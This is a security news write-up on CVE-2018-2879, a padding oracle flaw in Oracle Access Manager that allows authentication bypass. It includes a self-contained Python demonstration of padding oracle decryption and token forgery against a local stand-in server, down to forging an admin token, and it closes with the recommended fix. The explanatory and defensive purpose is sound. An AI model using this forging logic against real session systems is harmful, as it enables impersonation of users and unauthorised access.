A padding oracle vulnerability in Oracle Access Manager (CVE-2018-2879) can be exploited by attackers to bypass authentication and impersonate any existing user account.
The root cause is a flawed cryptographic format used by OAM: the data is encrypted without integrity protection, and the server responds differently to ciphertexts whose decryption ends in valid and invalid padding. That observable difference is exactly the oracle a padding oracle attack needs.
Because a padding oracle lets an attacker both decrypt existing ciphertexts and forge new ones without knowing the key, the flaw can be used to decrypt and encrypt the messages exchanged between OAM and the web servers it protects. The researchers who reported it (SEC Consult) constructed a valid session token, encrypted it using the oracle, and presented it to the web server, which accepted it. This gave them access to protected resources as a user already known to the OAM; no credential for that user was needed.
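The decrypt-and-forge capability described above, worked through as an added example; this is not SEC Consult's exploit and not Oracle's code. The token layout (IV followed by CBC ciphertext with PKCS#7 padding and no MAC), the server key and the stand-in block cipher are assumptions made so the script runs offline on the Python standard library; only the attack logic, which treats the cipher as a black box and talks to the receiver through a single yes/no oracle, carries over to a real target:

```python
import hashlib, hmac, os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in 128-bit block cipher (4-round Feistel over HMAC-SHA256) so the example needs
# only the standard library; the attack never looks inside it and works the same on AES-CBC.
def _f(key, half, rnd):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

# Receiving side. Assumed token layout: IV || CBC ciphertext, PKCS#7 padded, no MAC.
SERVER_KEY = hashlib.sha256(b"constructed demo key").digest()  # never leaves the server

def server_encrypt(plaintext):
    padded, out = pkcs7_pad(plaintext), [os.urandom(BLOCK)]
    for i in range(0, len(padded), BLOCK):
        out.append(block_encrypt(SERVER_KEY, xor(padded[i:i + BLOCK], out[-1])))
    return b"".join(out)

def server_decrypt(token):
    plain = b"".join(xor(block_decrypt(SERVER_KEY, token[i:i + BLOCK]), token[i - BLOCK:i])
                     for i in range(BLOCK, len(token), BLOCK))
    return pkcs7_unpad(plain)

def padding_oracle(token):
    # All the attacker observes: was the padding accepted? (For OAM this was a
    # distinguishable server response, not a boolean API.)
    try:
        server_decrypt(token)
        return True
    except ValueError:
        return False

# Attacking side: uses only padding_oracle, never SERVER_KEY.
def recover_intermediate(oracle, target):
    """Recover D_key(target) one byte at a time, last byte first."""
    inter = bytearray(BLOCK)
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        prefix = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):
            prefix[k] = inter[k] ^ pad      # make the already-known tail decrypt to `pad`
        for guess in range(256):
            prefix[pos] = guess
            if not oracle(bytes(prefix) + target):
                continue
            if pad == 1:                    # rule out an accidental ...02 02 (or longer) match
                probe = bytearray(prefix)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("no byte accepted: the receiver is not leaking padding validity")
    return bytes(inter)

def oracle_decrypt(oracle, token):
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plain = b"".join(xor(recover_intermediate(oracle, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)

def oracle_encrypt(oracle, plaintext):
    """Forge a token: pick the last block freely, then choose each earlier block so
    that D(next) XOR this block equals the plaintext block we want."""
    padded, blocks = pkcs7_pad(plaintext), [os.urandom(BLOCK)]
    for i in reversed(range(0, len(padded), BLOCK)):
        blocks.insert(0, xor(recover_intermediate(oracle, blocks[0]), padded[i:i + BLOCK]))
    return b"".join(blocks)

if __name__ == "__main__":
    print(oracle_decrypt(padding_oracle, server_encrypt(b"user=alice;role=reader")))
    print(server_decrypt(oracle_encrypt(padding_oracle, b"user=admin;role=superuser")))
```

Running the file first decrypts a constructed token and then forges one for a plaintext the server never encrypted; the server accepts it because nothing in the format binds the ciphertext to the key, so the IV and every preceding block can be chosen to produce whatever plaintext the attacker wants. Each block costs at most 16 × 256 oracle queries in either direction. The corresponding fix is an authenticated mode (such as AES-GCM) or an encrypt-then-MAC construction whose tag is verified before any decryption or padding check, so that malformed ciphertexts all fail in the same way.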
Read more: Help Net Security